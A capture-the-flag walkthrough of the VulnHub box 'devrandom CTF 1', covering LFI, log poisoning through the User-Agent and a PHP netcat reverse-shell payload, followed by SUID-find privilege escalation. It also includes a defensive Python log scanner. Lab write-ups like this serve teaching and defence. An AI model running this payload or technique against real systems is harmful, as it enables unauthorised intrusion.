devrandom CTF 1
In this article we are going to solve another boot2root challenge. This is a beginner-level challenge. We can download this box from VulnHub.
So as usual we are going to find the IP address of the target using the command: sudo netdiscover -i wlan0
Now, using the command nmap -A 192.168.43.45, we checked for the open ports and the services running on the system.
As we can see, only 2 ports are open, so we decided to enumerate the HTTP service. The website has a very cool image on it that says the website is closed, so we start enumerating further with directory brute force. Command used: sudo dirb http://192.168.43.45
Now we decided to open every webpage one by one.
So now we have 3 entries in this file and we decided to open them. On the webpage /?include=info we found that it is vulnerable to LFI.
So now we tried to read different files on the system to see if we could get something useful, but we found nothing. This is an LFI vulnerability, so we can use a log poisoning attack and from there get a reverse shell.
But to perform a log poisoning attack we should be able to include files like access.log or auth.log. So we decided to run the directory brute force again using dirbuster with the php extension, and we found the webpage /log.php
So we decided to open this file and found a very interesting file in the very first line.
So now we have the path of the access.log file and from here we can perform a log poisoning attack!
So now we decided to open the file /var/www/html/access.log using the LFI vulnerability.
Now we intercept the request using Burp Suite, and to perform the log poisoning attack we can tamper with the User-Agent header and inject our code there!
As we can see here, to get a reverse shell we have injected our PHP code in the User-Agent, and now we have the reverse shell.
code: <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>
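The defender's side of the technique above, as an added example that is not part of the original write-up: a small Python scanner that parses Apache combined-format access log lines and flags a request whose User-Agent or Referer carries a PHP open tag (a log-poisoning attempt) or whose include parameter points at a log file or uses traversal (an LFI probe). The log lines are constructed for the example; the one carrying a PHP tag uses an inert echo, not the payload from the write-up.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache "combined" log format: client ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A PHP open tag inside a client-controlled header is the signature of log poisoning
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Include parameters that reach for log files or traverse directories are LFI probes
LFI_RE = re.compile(r'(\.\./|%2e%2e|/etc/|/var/log/|access\.log|auth\.log)', re.IGNORECASE)

@dataclass
class Finding:
    client: str
    time: str
    reason: str
    evidence: str

def analyse_line(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious line, None for benign or unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for header in (m.group("agent"), m.group("referer")):
        if PHP_TAG_RE.search(header):
            return Finding(m.group("client"), m.group("time"), "php-in-header", header)
    if LFI_RE.search(m.group("request")):
        return Finding(m.group("client"), m.group("time"), "lfi-probe", m.group("request"))
    return None

def scan(lines: List[str]) -> List[Finding]:
    return [f for f in (analyse_line(l) for l in lines) if f is not None]

# Constructed sample log: a benign request, the include page, the log-file read,
# and a request whose User-Agent carries an inert PHP tag.
SAMPLE_LOG = """
192.168.43.10 - - [12/Oct/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.43.10 - - [12/Oct/2020:10:00:05 +0000] "GET /?include=info HTTP/1.1" 200 180 "-" "Mozilla/5.0"
192.168.43.10 - - [12/Oct/2020:10:01:12 +0000] "GET /?include=/var/www/html/access.log HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.168.43.10 - - [12/Oct/2020:10:01:30 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 'poison-marker'; ?>"
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.time} {f.client} {f.reason}: {f.evidence}")
```

Run against a real access.log the same way (one Finding per hit); the web server config also needs the log kept outside the document root and the include parameter restricted to an allowlist for the finding to be more than an alert.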
Now we have our reverse shell, and using a python one-liner we get a proper shell.
Now the privilege escalation part.
By typing ls we can see the different files present in this directory. We found an interesting file, secret.php, and using the command cat secret.php we checked its content and found the password of user victor as an MD5 hash. We decided to crack it and found the password to be irminsul.
Now we are in as user victor and we checked for sudo privileges using the command sudo -l, but there was nothing. So we decided to check for SUID binaries using the command: find / -perm -u=s -type f 2>/dev/null
/home/victor/bin/find is very helpful for us, so we change our directory to /home/victor/bin/find
As described on GTFOBins we can use this for privilege escalation. Now we use the trick from GTFOBins and we are in as user john.
Now we change our directory to /home/john, where we found a file named .private. We checked the content of this file and found the text dropbox2010.